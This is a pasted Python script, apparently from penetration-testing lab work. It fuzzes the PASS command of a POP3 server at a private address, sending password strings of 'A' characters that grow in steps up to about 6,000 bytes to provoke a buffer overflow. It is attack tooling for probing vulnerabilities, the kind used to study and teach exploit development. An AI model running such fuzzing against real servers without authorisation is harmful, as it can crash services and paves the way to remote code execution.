Author: Not specified | Language: python |
Description: Not specified | Timestamp: 2017-09-06 23:33:09 +0000 |
View raw paste | Reply |
- #!/usr/bin/python
- import socket
- buffer=["A"]
- counter = 100
- while len(buffer) <= 30:
- buffer.append("A"*counter)
- counter = counter + 200
- for string in buffer:
- print "Fuzzing PASS with %s bytes" %len(string)
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connect=s.connect(('10.11.12.104',110))
- s.recv(1024)
- s.send('USER tesrt\r\n')
- s.recv(1024)
- s.send('PASS ' + string + '\r\n')
- s.send('QUIT\r\n')
- s.close()
View raw paste | Reply |